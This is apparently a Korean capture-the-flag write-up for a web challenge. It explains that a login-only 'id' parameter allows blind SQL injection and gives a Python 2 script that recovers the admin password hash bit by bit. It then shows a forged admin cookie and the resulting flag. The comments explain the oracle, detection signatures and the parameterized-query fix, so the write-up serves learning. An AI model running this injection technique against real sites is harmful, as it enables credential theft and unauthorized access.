로그인 후 id 파라미터에서 SQLI가 터지는데 union이 안된다. 블라인드로 어드민 계정의 패스워드를 구해주면 아래와 같은 32자리 md5 해시값이 나온다.
import requests
def request(payload):
    """Boolean oracle for the blind injection: send one probe, report the page state.

    The probe is sent as the ``id`` query parameter of ``action=pm`` together
    with a fixed ``Cookie`` header (a guest login cookie and session id captured
    when this write-up was made; they are page-specific values, not reusable).
    Returns True when the literal "Welcome" appears in the response body and
    False otherwise. That true/false page difference is the only signal the
    script relies on, which is exactly what a boolean-based blind SQLi needs;
    the server-side fix is a parameterized query for ``id`` (and an identical
    response for any malformed id, so no condition leaks through the page).
    """
    url = "http://chall.tasteless.eu/level4/index.php"
    params = {'action':'pm','id':payload}
    # Hard-coded session identifiers: the script is tied to this one session.
    headers = {'Cookie':'login=guest%25084e0343a0486ff05530df6c705c8bb4; __cfduid=dc8f9c4e92cf4316e617bbaa23cfc8b8f1532166053; PHPSESSID=dnn3sve7g1th9sh0164soi6ck6'}
    response = requests.get(url,params=params,headers=headers).text
    # The presence of "Welcome" is the whole oracle: true condition vs. false one.
    if "Welcome" in response:
        return True
    else:
        return False
length = 0
# Step 1: find the password length, one probe per candidate value (0..99).
# Each probe asks "is length(pass for username 'admin') == i?". 0x61646d696e is
# the hex encoding of the string "admin" (presumably used to keep quote
# characters out of the payload). Each request is a separate round trip, so
# this step costs up to 100 requests.
# NOTE: if no value in 0..99 matches, `length` stays 0 and the extraction loop
# that follows runs zero iterations -- the script then prints an empty password
# without signalling that the oracle never answered true.
for i in range(0,100):
    payload = "1 and length((select pass from level4 where username=0x61646d696e limit 0,1))="+str(i)+"#"
    if request(payload) == True:
        length = i
        print "Find Admin Pw Length[*] = " + str(length)   # Python 2 print statement
        break
binary = ""
admin_pw = ""
# Step 2: recover the password one character at a time, 8 probes per character.
# For position i, lpad(bin(ascii(char)),8,0) is the character's ASCII value as an
# 8-digit binary string (MSB first); probe j extracts digit j and that digit
# ('0' or '1') is used directly as the boolean condition after `1 and`, so the
# oracle answers "is bit j set?" and the byte is reassembled locally.
# Cost: 8 * length requests on top of the length search. From the defender's
# side, a burst of requests whose id parameter carries substring(/bin(/ascii(
# and only differs in two small integers is the detection signature of this
# step; parameterized queries remove the injection point entirely.
for i in range(1,length+1):
    binary = ""
    for j in range(1,9):
        payload = "1 and substring(lpad(bin(ascii(substring((select pass from level4 where username=0x61646d696e limit 0,1),"+str(i)+",1))),8,0),"+str(j)+",1)#"
        if request(payload) == True:
            binary += "1"
        else:
            binary += "0"
    # An all-zero byte is skipped rather than appended as a NUL character.
    if binary !="00000000":
        admin_pw += chr(int(binary,2))
    print "Find Admin Pw[-] = " + admin_pw   # progress after each character (Python 2 print)
print "Find Admin Pw[+] = " + admin_pw
이걸 로그인 후 할당받는 쿠키 값 중 login=guest%25084e0343a0486ff05530df6c705c8bb4 요렇게 된 부분에 admin%2598aa0ec014a46e34571affaf88999ebb 요런식으로 넣어주면 플래그가 나온다.
Flag = D0nt_Yu0_LOv3_co0kies